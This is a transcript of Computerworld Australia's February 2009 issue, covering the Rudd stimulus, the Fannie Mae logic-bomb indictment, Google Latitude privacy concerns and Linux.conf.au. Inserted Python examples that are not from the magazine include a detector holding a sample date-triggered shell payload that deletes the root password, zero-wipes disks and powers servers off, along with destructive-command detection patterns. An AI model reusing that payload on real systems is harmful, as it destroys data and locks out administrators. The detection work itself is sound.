The Grill: (ISC)2's W Hord Tipton

Computerworld, February 2009 (www.computerworld.com.au). Document viewer transcript, 32 pages; uploaded by djrolandsps, 30 May 2018; page header printed 8/14/2019.

Page 2

Advertisement: CA

Get secure. Get compliant. Then belt up and MYOAETGIAMN (Make Your Organisation Agile Enough To Grow In A Moment's Notice).

Once your IT security is doing everything you expect it to, make it do something no one would ever expect: make your organisation more efficient, more flexible and more competitive than ever before. CA's approach to IT security centralises Identity and Access Management (IAM). That means you can deploy applications that deliver new services or capitalise on new opportunities, faster and more securely. And with best-in-class modularity, scalability and integration, CA security solutions enable efficiency. To learn more about the full potential of IT security, download the latest white paper at ca.com/au/secure.

Copyright 2009 CA. All rights reserved. GOVERN MANAGE SECURE
http://www.ca.com/au/secure

News | February 2009 | www.computerworld.com.au | 3

IN BRIEF

IN THIS ISSUE: February 2009

ONLINE at www.computerworld.com.au

SPECIAL REPORT: Linux.conf.au. Check out our extensive coverage of this year's open source conference in Hobart.

MOBILITY: Smartphones, iPhones, BlackBerrys and beyond. All the latest news, reviews, features and videos on the iPhone, BlackBerrys and other smart devices.

WEB: Google explores ocean depths. The latest version of Google Earth offers 3D maps of the ocean floor, as well as Mars and historical images.

SPECIAL REPORT: The A-Z of Programming Languages. Computerworld's ongoing series of investigations into the most widely used programming languages, including Ada, AWK, Bash, C# and more.

News
3 In Brief
4 Flying docs pilot first national e-health database
5 Privacy group calls Google Latitude a danger to security
6 HTC launches first Android phone in Australia
8 Windows 7 to be sold in six versions
10 On the scene: Linux.conf.au 2009
12 The Grill: W Hord Tipton

Opinion
14 Top 10 qualities of a great IT shop (Paul M Ingevaldson)
15 Panic and how to prevent it (Paul Glen)
15 Security predictions for 2009 (Andreas Antonopoulos)

In Every Issue
14 Shark Tank
30 Good, bad & ugly
30 Notes from left field

Features
16 The Big Switch to cloud computing. Nicholas Carr touts reliability but fears vendor lock-in. (Thomas Hoffman)
18 Forecast 2009: The year ahead for IT. Experts weigh in with their predictions of what will be hot and not in IT for 2009. (By Staff Writers)
24 Office bling for '09. Old notion: squeeze every drop from your old equipment. New order: fresh gadgets crank up your productivity. (Russell Kay)
26 10 tech people you should know. These power-brokers' decisions could shape enterprise IT for years to come. (Ann Bednarz)
29 Service-level agreements: IT's value proposition. An SLA is your chance to demonstrate IT's worth to the business. Here's how to get it right. (Bob Anderson)

ACS, AIIA disappointed at Rudd stimulus

Australian ICT industry representative bodies have panned the exclusion of ICT infrastructure spending from the Rudd Government's economic stimulus package. In response to the grim global economic climate and bleak forecasts of the International Monetary Fund (IMF), the Rudd Government unveiled a far-reaching $42 billion stimulus package that included, among other incentives, a 30% tax break for small businesses on items worth more than $1000 purchased before June 30.

Australian Information Industry Association CEO, Ian Birks, said while the package would bring a welcome boost to technology spending by organisations, it failed to look at the big picture for ICT.

"I think we would say the package has insufficient focus on the digital economy, on new technologies, and really feels like the Government may be missing the point somewhat about the transformational impact ICT can have," Birks said.

"We would urge the fast tracking of a lot of existing commitments like the NBN, the e-Health commitment, and the use of smart IT in carbon reduction. All of those things that have been talked about and socialised in the Government's agenda need to be fast tracked and need to happen sooner rather than later. That will have a massive stimulatory impact."

Australian Computer Society president, Kumar Parakala, praised the Government's approach to assisting the economy but also criticised the lack of ICT infrastructure spending in the package. "This has been a missed opportunity to invest in Australia's digital economy, which could potentially have helped Australia to become an international powerhouse in these times of crisis," Parakala said.

Despite the lack of big picture spending, both Birks and Parakala welcomed the other incentives, in particular the tax breaks for small businesses.

Under the plan, small businesses with a turnover of less than $2 million a year can claim a 30% tax deduction on items (including ICT hardware) worth more than $1000 and bought before June 30. A 10% deduction will also be given for assets bought between July and December (and installed before December 31, 2010). Larger businesses are eligible for the same tax breaks on eligible items worth more than $10,000. Trevor Clarke


News 4 | www.computerworld.com.au | February 2009

Telstra, AFL win hyperlink case against News Ltd

The Federal Court has ruled hyperlinks to Telstra-copyrighted AFL video clips on YouTube were unlawful.

The hyperlinks, which were featured on News Limited subsidiary Web sites in mid-2008, were found to have breached copyright laws by undermining the exclusive broadcasting rights granted to Telstra by the AFL.

A spokesperson at Telstra said the company was pleased the court had ruled in such a way that saw its hard-won media rights upheld. "We're a rights-holder. We fought hard to gain these rights... If anyone chooses to act in a way that directly violates [our rights], we're going to take action."

Telstra and the AFL first took News Limited to court after their requests to remove the offending hyperlinks from the AdelaideNow, Courier Mail, Daily Telegraph, Herald Sun and PerthNow Web sites in May and June 2008 fell on deaf ears. In the end, it was the broadcasting behemoth YouTube who agreed to remove the infringing video clips.

"The Federal Court Orders should serve as a warning to ensure that the exclusive new media rights that Telstra holds for premier Australian sports are respected," said Justin Milne, group managing director, Telstra media.

"If third parties are allowed to undermine these agreements, it undermines the value of future media rights and jeopardises revenues that the AFL invests in the future of the game."

While the full details of the court settlement remain confidential, News Limited has agreed never again to provide hyperlinks to infringing AFL footage on YouTube or other related Web sites.

The AFL uses the revenue from media rights to support all AFL clubs and improve club facilities. Emma McKinnon

MySQL co-founder quits Sun

Michael "Monty" Widenius, the original developer of the open-source MySQL database, has left Sun Microsystems and is starting his own company, Monty Program Ab, he said in a blog post on Feb 5.

Widenius and Sun had a slightly rocky relationship since the vendor bought MySQL last year for US$1 billion. In a much-discussed November blog post, he trashed Sun's decision to give MySQL 5.1 a generally available designation, saying it was riddled with serious bugs.

In a December interview with IDG News Service, Marten Mickos, senior vice president of Sun's database group, downplayed Widenius' criticisms, saying that at an open-source-oriented company like Sun, people are free to blog about what they want.

And now in his latest blog post, Widenius revealed what was happening in the months prior to his departure, and what he plans to do now.

Rumours that Widenius would resign were circulating around August and September last year, he wrote. Widenius acknowledged that he told Sun management he would submit his resignation immediately because he "strongly believed that the 5.1 release was not ready and that those problems needed to be fixed before it went GA."

Widenius ultimately agreed to stay for three more months to help Sun work out things in MySQL Development and also "give Sun a chance to create an optimal role for me within Sun."

"That ended up lasting a few more months, and the changes I had hoped Sun would apply in the MySQL Database group to fix our development and community problems did not happen fast enough," he wrote.

Meanwhile, Monty Program Ab will be "a true open-source company, with only a small number of employees who strive to have fun together and share the profit we create." The company will work on the Maria project, a storage engine Widenius and others developed. Chris Kanaracus

Flying docs pilot first national e-health database
Regional sites united after 80 years

The Royal Flying Doctor Service (RFDS) is deploying what may be the first national e-health records management system to unify disparate medical databases across its four regional sites.

The RFDS was established in 1928 as the Area Medical Service and provides not-for-profit aero-medical and primary healthcare to regional and remote Australia. It consists of four independent divisions, with 25 sites and 776 staff, and services all but the upper region of the Northern Territory.

Speaking at an e-health summit in Sydney, RFDS national and sectional ICT manager Gary Oldman said the $2.9 million government-funded e-health records system will replace siloed databases and manual processes throughout the organisation.

"Electronic records are being deployed to other regions [following] the success of the first roll out in our South East [division]," Oldman said, adding it will be the first time the RFDS sites have cooperated in 80 years.

"[Other regions] have separate databases in their laptops without central storage... There are problems with remote access and retrieving patient data after-hours.

"We want to end up with a single national medical identifier, but [RFDS] is split into legally separate entities. We will use separate identifiers for now."

The national deployment, dubbed E-Health for Remote Australia (EHRA), will mirror the initial e-health system deployment which centralised nine isolated databases.

It is expected that the Medical Doctor content management database will be installed on all RFDS laptops to facilitate central storage of medical data using Telstra's Next G mobile network. A replication feature allows data uploads to be delayed during coverage black spots in remote areas.

Oldman said the transition to EHRA will be a huge challenge for some RFDS sites, but is confident of meeting the February 2010 completion date thanks to the recruitment of a dedicated project manager, extensive system testing and scheduled staff training.

Staff from the South East division are already calling for more complex data such as X-rays to be included in the database, which holds more than 14,000 client details.

The South East wing employs 165 staff including doctors, nurses, and specialist clinicians, receives some 5000 calls a year, and is the only division to cross three state boundaries. Oldman said the federal government will soon reform laws that require its clinicians to hold medical licences for each state.

Funding for EHRA was granted by the Howard government under its Clever Networks initiative.

The RFDS last year flew more than 23 million kilometres in 51 aircraft, performed almost 36,000 aerial evacuations and helped 132,524 patients. Darren Pauli


News | February 2009 | www.computerworld.com.au | 5

Privacy group calls Google Latitude a danger to security
Upgrade to Google Maps lets friends, family, employers know one's every move

A privacy group is calling Google's new mapping application an unnecessary danger to users' security and privacy.

The criticism comes almost immediately after Google unveiled Google Latitude, an upgrade to Google Maps that allows people to track the exact location of friends or family through their mobile devices. Google Latitude not only shows the location of friends, but it can also be used to contact them via SMS, Google Talk or Gmail.

Privacy International is raising a red flag about the technology. "Many people will see Latitude as a cool product, but the reality is that Google has yet again failed to deliver strong privacy and security," said Simon Davies, the director of London-based Privacy International.

"The company has a long way to go before it can capture the trust of phone users. As it stands right now, Latitude could be a gift to stalkers, prying employers, jealous partners and obsessive friends. The dangers to a user's privacy and security are as limitless as the imagination of those who would abuse this technology."

Google, responding to Computerworld questions in an e-mail, said their engineers and designers took privacy and security concerns into account when they were creating Google Latitude.

"Concerns have been raised about the possibility of the product being installed onto someone's mobile phone covertly," said a Google spokeswoman. "While many of the scenarios that have been described are unlikely, we take this issue seriously and always listen to feedback from our users. We already have a safety feature working on certain mobile devices that actively alerts users that Latitude is running and we are in the process of extending this notification to other mobile platforms supporting Google Latitude."

Privacy International, in an online posting, expressed concern that Google Latitude lacks sufficient safeguards to keep someone from surreptitiously opting in to the tracking feature on someone else's device. The problem arises when someone can gain physical access to another's mobile phone.

The privacy group added that the only way to reduce this threat is to have a regular message pop up on the phone, reminding the user that Latitude is in use.

Google's spokeswoman noted that the message that pops up on BlackBerry devices is engaged when Latitude has been installed but not been used for a while.

That doesn't appear to be an adequate safeguard for the privacy group, which said in a written statement, "If the tracked party is unaware that her phone has been enabled, the Latitude settings could indefinitely be set to continuous tracking, thus ensuring that the alert message is never sent from Google."

Dan Olds, principal analyst at Gabriel Consulting Group, said the Google tool is interesting even if there are obvious potential privacy issues when people know your every move.

Olds added that people need to think through who can access such personal information. "Users need to understand how to do it and why they probably don't want to constantly broadcast their locations to the world at large," he said. Sharon Gaudin
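The disagreement between Google and Privacy International comes down to what triggers the reminder. The following Python is an added example written for this page, not code from Google, Privacy International or the article: it models the two policies over constructed activity timelines, the idle-gated alert Google described for BlackBerry (fires only after Latitude has been installed but not used for a while) and the fixed-interval reminder Privacy International asked for. The day-based timelines, the 14-day threshold and interval, and the one-year horizon are all assumptions.

```python
"""
Idle-gated versus periodic tracking reminders.

Added example for this page; not code from Google, Privacy International
or the article.  Every threshold, horizon and activity pattern below is a
constructed assumption; time is measured in whole days.
"""


def idle_gated_alerts(active_days, idle_threshold, horizon):
    """Days on which an idle-gated alert fires.

    The alert fires once `idle_threshold` consecutive days pass without
    any Latitude activity, then the idle counter restarts.  Any activity,
    including a tracker polling the victim's location, resets it."""
    active = set(active_days)
    idle, fired = 0, []
    for day in range(horizon):
        idle = 0 if day in active else idle + 1
        if idle == idle_threshold:
            fired.append(day)
            idle = 0
    return fired


def periodic_alerts(interval, horizon):
    """Days on which a fixed-interval reminder fires, independent of use."""
    return list(range(interval, horizon, interval))


def covert_tracking(horizon):
    """Activity pattern of someone who enabled Latitude on another
    person's phone and keeps polling its location every day."""
    return list(range(horizon))


def forgotten_install(last_active_day):
    """Activity pattern the idle-gated alert was designed for: the owner
    installed Latitude, used it for a few days and then forgot about it."""
    return list(range(last_active_day + 1))


def compare(active_days, idle_threshold=14, interval=14, horizon=365):
    """Number of reminders each policy delivers over the horizon."""
    return {
        "idle_gated": len(idle_gated_alerts(active_days, idle_threshold, horizon)),
        "periodic": len(periodic_alerts(interval, horizon)),
    }


if __name__ == "__main__":
    print("forgotten install:", compare(forgotten_install(3)))
    print("covert tracking:  ", compare(covert_tracking(365)))
```

Under the forgotten-install pattern both policies remind the owner regularly, so they look equivalent in the benign case. Under continuous covert tracking the idle counter never reaches its threshold and the idle-gated alert fires zero times in a year, which is exactly the scenario in Privacy International's statement: a safeguard whose trigger the abuser controls is not a safeguard. A reminder that fires on enablement and then on a fixed schedule does not have that hole.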


News 6 | www.computerworld.com.au | February 2009

Lenovo CEO resigns as PC maker posts US$97M loss

William Amelio resigned from his job as president and CEO at Lenovo Group after the PC maker reported a US$97 million loss for the last three months of 2008.

Amelio, a former Dell executive, had led a broad restructuring of Lenovo's worldwide operations since he took over as CEO in late 2005. Just last month, for example, Lenovo said it planned to lay off 2500 workers, cut executive salaries and combine its operations in Russia and the Asia-Pacific region.

But the company's business outlook has only grown worse since then. In the announcement of its latest financial results and Amelio's departure, Lenovo said revenue declined 20% on a year-to-year basis in its fiscal third quarter, which ended Dec 31. And in a filing submitted to the operator of Hong Kong's stock exchange, the company warned that it expects "the next several quarters [to] remain very challenging for Lenovo and the rest of the PC industry."

Lenovo said Amelio's three-year employment contract had expired. He will work as an adviser to the company through the end of September, the company said in a separate filing to the Hong Kong exchange. "Mr. Amelio confirmed that he has no disagreement with the board, and there are no matters in respect of his resignation that need to be brought to the attention of the shareholders of the company," Lenovo wrote in that filing.

But the sudden nature of Amelio's departure caught many Lenovo watchers by surprise. "They said he had a three-year contract, but that just raises the question of why they didn't renew it," said Bryan Ma, an analyst at the Asia-Pacific unit of market research firm IDC.

Amelio is being replaced as CEO by Yang Yuanqing, who was Lenovo's CEO from 2001 to 2004 and has been its chairman since then. Liu Chuanzhi, Lenovo's founder and chairman prior to Yang, will now re-assume that position at the company. Rory Read, who had been Lenovo's senior vice president of global operations, is being promoted to president and chief operating officer.

Lenovo said its third-quarter results were hurt primarily by a slowdown in the Chinese PC market, which accounted for almost half of its sales in the quarter. Shipments in China during the third quarter fell 7% compared with the same period a year earlier, according to Lenovo, which said that its new management team plans to focus more closely on China in an effort to boost sales there.

Amelio is the second American CEO to step down since Lenovo acquired IBM's PC division in 2005 and moved its corporate headquarters to the US. His predecessor, Stephen Ward, who became CEO immediately following the acquisition, resigned later that year. Sumner Lemon

Fannie Mae engineer indicted for planting server bomb

A former Unix engineer for the US Federal National Mortgage Association, better known as Fannie Mae, has been accused of planting malicious code on the corporation's network that was to destroy and alter all of the data on the company's servers.

Rajendrasinh Babubhai Makwana, 35, was indicted on Feb 3 by a US federal court on a single charge of computer intrusion.

Makwana, an employee for OmniTech Systems, was let go from his contract position at one of Fannie Mae's data centres on Oct 24, 2008, after he had "erroneously created a computer script that changed the settings on the Unix servers without the proper authority of his supervisor," read a complaint sworn by FBI Special Agent Jessica Nye. Makwana had created that settings-changing script on Oct 10 or Oct 11, Nye said, as much as two weeks before he was fired.

Within 90 minutes of being told he was terminated on Oct 24, and several hours before his access to the Fannie Mae network was disabled later that evening, Makwana embedded a malicious script in a legitimate script that ran on Fannie Mae's network every morning, Nye said in her affidavit.

The malicious script was set to trigger Jan 31 but was discovered by another Fannie Mae engineer just five days after Makwana was fired. According to the criminal complaint filed in US District Court, Makwana tried to hide the malicious script by inserting a page of blank lines at the bottom of the legitimate script.

"It was only by chance that [the Fannie Mae engineer] scrolled down to the bottom of the legitimate script to discover the malicious script," the complaint read.

If the malicious script had gone undiscovered, it would have disabled monitoring alerts and all logins, deleted the root passwords to the approximately 4000 servers that Fannie Mae operates, then erased all data and backup data on those servers by overwriting with zeros.

"Finally, this script would power off all servers, disabling the ability to remotely turn on a server," said the government's complaint. "Subsequently, the only way to turn the servers back on was physically getting to a data centre."

The script "would have caused millions of dollars in damage and reduced if not shutdown [sic] operations at [Fannie Mae] for at least one week" if it had not been found before the trigger date, the complaint said. Gregg Keizer
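Two things in the complaint are worth turning into routine checks: the concealment (a malicious tail appended after a page of blank lines to a script that runs every morning) and the timing (the edit was made within 90 minutes of termination and hours before access was cut). The following Python is an added example written for this page; it is not code from the article, from Fannie Mae or from the court filings. It scans a scheduled shell script for a long blank-line gap, a branch gated on a literal date, and destructive commands, and it keeps a hash baseline so that any edit to a cron script is flagged whatever it contains. The sample script, the command patterns and the 20-line gap threshold are constructed assumptions.

```python
"""
Static checks for a logic bomb hidden in a scheduled shell script.

Added example written for this page; not code from the article, from
Fannie Mae or from the court filings.  The sample script, the command
patterns and the 20-line gap threshold are constructed assumptions.
"""
import hashlib
import re

# Constructed sample: a benign nightly job with a malicious tail hidden
# behind 60 blank lines (the complaint says "a page").
LEGIT_PART = """#!/bin/sh
# nightly: rotate logs and sync reports
/usr/sbin/logrotate /etc/logrotate.conf
rsync -a /var/reports/ backup:/srv/reports/
"""
MALICIOUS_TAIL = """if [ "$(date +%m%d)" = "0131" ]; then
  # silence monitoring, lock everyone out, wipe, power off
  /etc/init.d/monitoring stop
  passwd -d root
  for d in /dev/sd?; do dd if=/dev/zero of=$d bs=1M; done
  shutdown -h now
fi
"""
SAMPLE_SCRIPT = LEGIT_PART + "\n" * 60 + MALICIOUS_TAIL

# Commands that have no place in a routine job.  An illustrative starting
# point, not an exhaustive signature set.
DESTRUCTIVE = [
    r"\bdd\b.*if=/dev/zero",
    r"\brm\s+-rf\s+/(\s|$)",
    r"\bshutdown\b|\bhalt\b|\bpoweroff\b",
    r"\bpasswd\s+-d\b",
    r">\s*/etc/(passwd|shadow)\b",
]
# A branch whose condition compares the current date with a literal,
# e.g.  if [ "$(date +%m%d)" = "0131" ]
DATE_TRIGGER = re.compile(r"date\s+\+\S*.*?(==?|!=|-eq|-ne)\s*[\"']?\d{2,8}")


def blank_gap_start(text, min_blank=20):
    """1-based number of the first non-blank line that follows a run of
    at least `min_blank` blank lines, or None if there is no such run."""
    run = 0
    for num, line in enumerate(text.splitlines(), start=1):
        if line.strip() == "":
            run += 1
            continue
        if run >= min_blank:
            return num
        run = 0
    return None


def date_triggers(text):
    """Line numbers of lines that gate execution on a literal date."""
    return [num for num, line in enumerate(text.splitlines(), start=1)
            if DATE_TRIGGER.search(line)]


def destructive_commands(text):
    """(line number, pattern) for every destructive command found."""
    hits = []
    for num, line in enumerate(text.splitlines(), start=1):
        for pattern in DESTRUCTIVE:
            if re.search(pattern, line):
                hits.append((num, pattern))
    return hits


def scan_script(text):
    """Combine the checks.  A script is suspicious when content hides
    after a blank-line gap, or when a date-gated branch is paired with
    destructive commands."""
    gap = blank_gap_start(text)
    dates = date_triggers(text)
    destructive = destructive_commands(text)
    return {
        "gap_at": gap,
        "date_triggers": dates,
        "destructive": destructive,
        "suspicious": gap is not None or bool(dates and destructive),
    }


def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()


def changed_scripts(baseline, current):
    """Names whose content no longer matches the baseline hash (or that
    the baseline never saw).  Re-hashing the cron directories at the
    moment an administrator is let go would have surfaced an edit made
    while access was still live."""
    return sorted(name for name, body in current.items()
                  if baseline.get(name) != sha256(body))


if __name__ == "__main__":
    print(scan_script(LEGIT_PART))
    print(scan_script(SAMPLE_SCRIPT))
    baseline = {"nightly.sh": sha256(LEGIT_PART)}
    print(changed_scripts(baseline, {"nightly.sh": SAMPLE_SCRIPT}))
```

The content scan is the cheap first pass (an editor that shows line counts would have made the blank-line trick obvious as well); the hash baseline is the control that does not depend on recognising any particular payload, and it belongs in the termination checklist alongside revoking access, which in this case lagged the dismissal by several hours.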

HTC launches first Android phone in Australia
Dream available on the Optus network from 16 Feb

HTC has partnered with Optus to release the first mobile phone in Australia based on Google's Android platform, the Dream.

Boasting a large touch screen and an intuitive user interface, HTC's Dream is set to target early adopters rather than typical consumers or business users. The open source Android operating system is the key feature, along with instant access to a range of Internet services including the suite of Google applications: Gmail, Google Maps, Google Talk, Google Calendar and Google Search.

The Dream will be available from 16 Feb on a range of Optus plans. It will not be sold outright, though Optus has confirmed the handset will not be network locked. Despite Optus being the only carrier to launch the Dream, there is no exclusivity period.

The Dream will be available to purchase on four plans, including two timeless plans. A $59 Internet Cap plan includes $350 worth of calls and text and 500MB of data, while a $79 Internet Cap plan includes $550 worth of calls, unlimited text and 700MB of data. Two timeless plans offer 1.5GB ($113.95 per month) and 3GB ($129) data allowances respectively.

Optus offers all plans on either 12 or 24 month contracts, with monthly handset repayments differing depending on the length of the plan. For more information on these plans, check out www.optus.com.au/dream.

Optus confirmed the Dream will not run on its 900MHz 3G network, and will instead operate only on the 2100MHz band. Key features of the touch screen-equipped Dream include a full, slide-out QWERTY keyboard, 3G connectivity and a 3.2-megapixel camera. It also features Wi-Fi, Bluetooth and a navigational trackball, as well as access to the Android Market, where users can download a variety of applications. Ross Catanzariti

[Photo: HTC's Dream phone]


Advertisement: ISACA

INVENT YOUR FUTURE. Get Certified!
Exam Registration Deadline: 8 April 2009
Exam Date: 13 June 2009
Visit www.isaca.org/cwaustralia.

News Analysis 8 | www.computerworld.com.au | February 2009

Windows 7 to be sold in six versions
All Windows 7 editions to run on netbooks as Microsoft returns to the versioning strategy it employed for XP
Eric Lai

LOOKING TO ANSWER COMPLAINTS about the proliferation of Windows flavours, Microsoft said that it will generally deploy two primary versions of Windows 7, although it will still offer six editions for sale.

The two main editions will be Windows 7 Home Premium for consumers and Windows 7 Professional for business users.

"The first change in Windows 7 was to make sure that editions of Windows 7 are a superset of one another. That is to say, as customers upgrade from one version to the next, they keep all features and functionality from the previous edition," Mike Ybarra, Microsoft general manager for Windows, was quoted as saying in a Q&A on Microsoft's PressPass public relations Web site.

That decision represents a return to the version structure that Microsoft used for Windows XP.

As for the decision to focus on just two versions, Ybarra said: "We think those two SKUs [stock-keeping units] will meet most customers' needs. Home Premium will give consumers a full-function PC experience and a visually rich environment in everything from the way they experience entertainment to the way they connect their devices," he said. "Windows 7 Professional is the recommended choice for small businesses and for people who work at home but have to operate in an IT-managed or business environment where security and productivity are critical. For those running Windows Vista Business, it will be a very logical move to Windows 7 Professional."

Starter to Ultimate

Altogether, the company will still offer six main editions of Windows 7, not including the special N versions that lack Windows Media Player, a move mandated for customers in the European Union. That's the same number of versions as in Windows Vista and XP, which both came in six basic editions plus two EU-mandated N versions.

A Microsoft spokesperson confirmed that the company will continue to offer N SKUs of Windows 7 for the EU but declined to say how many would be offered. But the Home Basic version that is at the heart of the ongoing Vista Capable lawsuits will be exiled to emerging markets.

With Windows 7, the lowest-end version consumers in the developed world will see will be the Windows 7 Starter Edition, which Ybarra said will become available worldwide for pre-installation on new PCs limited to specific types of hardware. That hardware would include netbooks, according to a separate PressPass Q&A with Brad Brooks, Microsoft's corporate vice president for Windows consumer product marketing.

In addition, there will also be Enterprise and Ultimate versions, which both existed in Windows Vista. Enterprise includes all of Professional's features and then some, and it will only be available to large corporate customers.

Windows 7 DVDs will continue to include the code for all versions of the operating system. That means users with a licence for Starter Edition, for instance, can do an Anytime Upgrade all the way up to Ultimate by visiting Microsoft's Web site and paying. Users can then upgrade their PCs using the original Windows 7 DVD in a matter of minutes, according to Microsoft.

Microsoft also plans to offer upgrade pricing for XP users looking to move to Windows 7, but they will be required to do a clean install of the new operating system.

Logical Lineup

Windows blogger Paul Thurrott applauded Microsoft's strategy, saying it is less about trying to achieve a Mac OS X-like minimalism (Apple's operating system comes in a single version) than to create a logical lineup. In Vista, some supposedly higher-end versions of the operating system lacked features that lower-end versions possessed, and vice versa.

"I think that confused people and made them mad," he said. That has been cleaned up in Windows 7, he said, so that each version is a superset of the one below it. That means Windows 7 Ultimate will come with every feature, including supposedly enterprise-oriented ones, which was not true in Vista, Thurrott said. Microsoft did not disclose prices for each version. "That's the missing piece," he said. "If Microsoft does the right thing there, with the stinking economy, then this is all good news."

Microsoft has no plans to bring back the Media Center and Tablet editions that were part of the XP lineup, according to Thurrott, who was briefed by Microsoft. Media Center features, for instance, will be available in all versions from Home Premium and up, including business-oriented flavours such as Professional and Enterprise.

Windows 7 Starter will restrict users from opening more than three applications at a time. It will also lack multimedia features such as the Aero Glass user interface, native DVD video playback and authoring, and support for multiple monitors.

Home Basic will actually include more features than Starter, though it too will lack Aero and Media Center and DVD playback, according to a chart seen by Computerworld.

Home Premium includes all of the above features, plus the new Windows Touch support. Professional includes all of Home Premium's features, plus business-oriented networking and security functions, such as file system encryption and group policy controls. Windows 7 Enterprise and Ultimate will have identical feature sets, according to the chart.


Advertisement: IBM / Southern Cross

Security Without Compromise from a single appliance

SECURITY THREATS ARE strategic and take a multi-layered approach to attacking network systems. Some of the more sophisticated network security threats are symbiotic in nature. In some instances these exploits go by unnoticed for long periods of time, and once they are identified, the damage is done.

Network security must not only address the known threats, but must protect businesses from the unknown. A pre-emptive approach is vital for organisations as they expand their network-based application structure and reliance on information passed and obtained through the Internet. The need for data protection and business sustainability increases exponentially as more information is transferred across workstations, business networks, partner portals, and the Internet.

Unified Threat Management

The unified threat management (UTM) space evolved out of the need for IT security to both address the evolving threats and support expanding business requirements. Basic firewall protection was not enough for most companies, and to expand protection with siloed security products was costly. As a result, unified threat management (UTM) solutions offer multiple security solutions in a single platform, allowing organisations to implement cost effective security for their network.

Learn more about how you can reduce costs, while simplifying your defence against Internet-based threats to your network with unified threat management (UTM) from IBM.

Call the world leader in security, IBM, or their specialist security partner Southern Cross on 1800 804 203 and secure your network from only $2,198.

News Analysis

On the scene: Linux.conf.au 2009
As open source enthusiasts descended on Hobart for this year's Linux.conf.au event one thing was clear: open source is maturing in the enterprise
Rodney Gedda

In January this year more than 500 Linux and open source enthusiasts descended on Hobart in Tasmania for Linux.conf.au (http://linux.conf.au/), one of the most popular open source software conferences in the world. Computerworld's Rodney Gedda was there to cover the event and discover the latest developments in Linux and open source software and what the advancement will mean for IT departments.

One noteworthy aspect of this year's event was the inroads that Linux and open source software are making in the business world. Many of this year's attendees were from enterprise and government organisations, and the content catered for them well.

Exchange compatibility coming to Linux

Recent developments in the OpenChange and KDE open source projects are set to bridge a missing link in messaging and groupware compatibility from Microsoft's Exchange to open source clients.

Canberra-based OpenChange and KDE developer Brad Hards said the ultimate goal of the OpenChange project is to implement the Microsoft Exchange protocols that are used by Outlook.

"In my workplace, a major government department that shall remain nameless, the main dependency on Outlook and Exchange is not mail, but seeing other people's calendars and making shared appointments. You can't get appointments with some people unless you send them invitations."

OpenChange has client- and server-side libraries for Exchange integration and relies heavily on code developed for Samba 4. It is open source software licensed under the GPL version 3.

Hards said more work is being done on the client side and "we have code for the server", but estimates another 12 months of development is required to produce an OpenChange server ready for production.

Active Directory comes to Linux with Samba 4

Enterprise networks now have an alternative choice to Microsoft Active Directory (AD) servers, with the open source Samba project aiming for feature parity with the forthcoming release of version 4, according to Canberra-based Samba developer Andrew Bartlett.

Bartlett said Samba 4 is aiming to be a replacement for AD by providing a free software implementation of Microsoft's custom protocols.

Because AD is far more than LDAP and Kerberos, Samba 4 is not only about developing with Microsoft's customisation of those protocols, Bartlett said, it is also about moving the project beyond simply providing an NT 4 compatible domain manager.

Over the past year, Samba 4 has added multi-master replication leveraging OpenLDAP, making Samba no longer a single-server implementation.

Samba also changed its scripting language to Python, which Bartlett said should be easier for administrators, and there are bindings for other tools. Bartlett also said Samba 4 has had a lot of input from system administrators, but still needs more help.

Microsoft has also provided a copy of its AD schema which can be worked around by the Samba team.

Linux virtualisation battles for hacker interest

If the Linux virtualisation space wasn't heated enough, the open source hypervisors Kernel Virtual Machine (KVM) and Xen are now battling it out for independent developer interest, according to Xen hacker Simon "Horms" Horman.

While Xen has attracted a lot of commercial support from big-name software vendors like Citrix, Novell and Oracle, Horms believes it is losing its appeal to, and contributions from, independent kernel developers due to sheer "geek value".

"It's the nature of the maturity of a technology. The developers are drawn to the bleeding edge," Horms said. "There are a lot more interesting things happening in the KVM space now."

He said Xen is more mature, so if a business is going to deploy virtualisation software now it will be either Xen or VMware; however, if you are looking at the future KVM is in a strong position because of the way it is already integrated into the Linux kernel.

Horms said it could take another six months to a year before Xen gets into the mainline kernel.

Xen is working to strip out the need for a full-blown Linux instance, Horms said, and the idea is to shrink it to make it easier to trust it.

A new Linux for netbooks with Ubuntu Mobile

The Ubuntu Mobile operating system is undergoing its most radical change with a port to the ARM processor for Internet devices and netbooks, and may use Nokia's LGPL Qt development environment as an alternative to GNOME.

Canonical's David Mandala said Ubuntu Mobile has changed a lot over the past year and now includes netbook devices in addition to MIDs and the ARM port.

Ubuntu Mobile uses the GNOME Mobile (Hildon framework) instead of a full GNOME desktop, but since Nokia open-sourced Qt under the LGPL it may consider this as an alternative.

"The KDE stuff and Qt is getting LGPL which will change the whole space. So watch this space as it is changing dramatically. We will choose the best tool."

Mandala said some of the KDE apps fit on the smaller screens well. "I can't say anything about KDE at this point, but who would have thought Qt would go LGPL?" he said.

Ubuntu Mobile for netbooks will also get its own distribution in line with the release of Jaunty Jackalope in April 2009.

Wikipedia and Google shed light on tech developments

The proliferation of standards-based video sharing and collaboration is set to take off with a $US100,000 grant from the Mozilla Foundation to fund the development of the Ogg Theora video codec and server-side streaming software.

Wikimedia developer Michael Dale announced the sponsorship during a presentation on Wikipedia's video content initiatives at the conference.

The $100,000 grant is a six-month project for Ogg Theora encoder enhancements, improvements to network seeking, and client and server libraries which will end up in Firefox and MediaWiki.

Aussie software is helping to bring video to Wikipedia. Annodex, the software being used to power Wikipedia's collaborative video sharing, has its origins at the CSIRO.

Australian Annodex developer Conrad Parker will spend one day a week working on the server-side seeking support to improve the speed of doing network seeking as a result of the Mozilla funding.

"I'll be improving network seeking in general," Parker said, adding he will collaborate with the W3C media fragments working group to help develop the open standard.

Google ramps up IPv6 mission

Google has begun preaching the wonders of IPv6 in the hope more awareness will help expedite the transition from the legacy IPv4 networks most people use today.

Senior Google software engineer Angus Lees recalled how Google's IPv6 efforts started as a covert, hobbyist project about two years ago and has gained enough momentum that a AAAA record for google.com could be added to Google's DNS in a year.

Lees' biggest challenge is how to make any IPv6-supported services completely transparent to end-users. The content will be the same, but running over IPv6 instead of IPv4.

Google has had an IPv6-only search site at ipv6.google.com for the best part of a year, but only just announced its IPv6 whitelist at google.com/ipv6. Locally, Lees said AARNet has expressed interest in joining the whitelist, so people on AARNet should be able to access Google's IPv6 site.

As for the death of IPv4, Lees was pragmatic: "We will never turn off IPv4 so long as people are still using it."
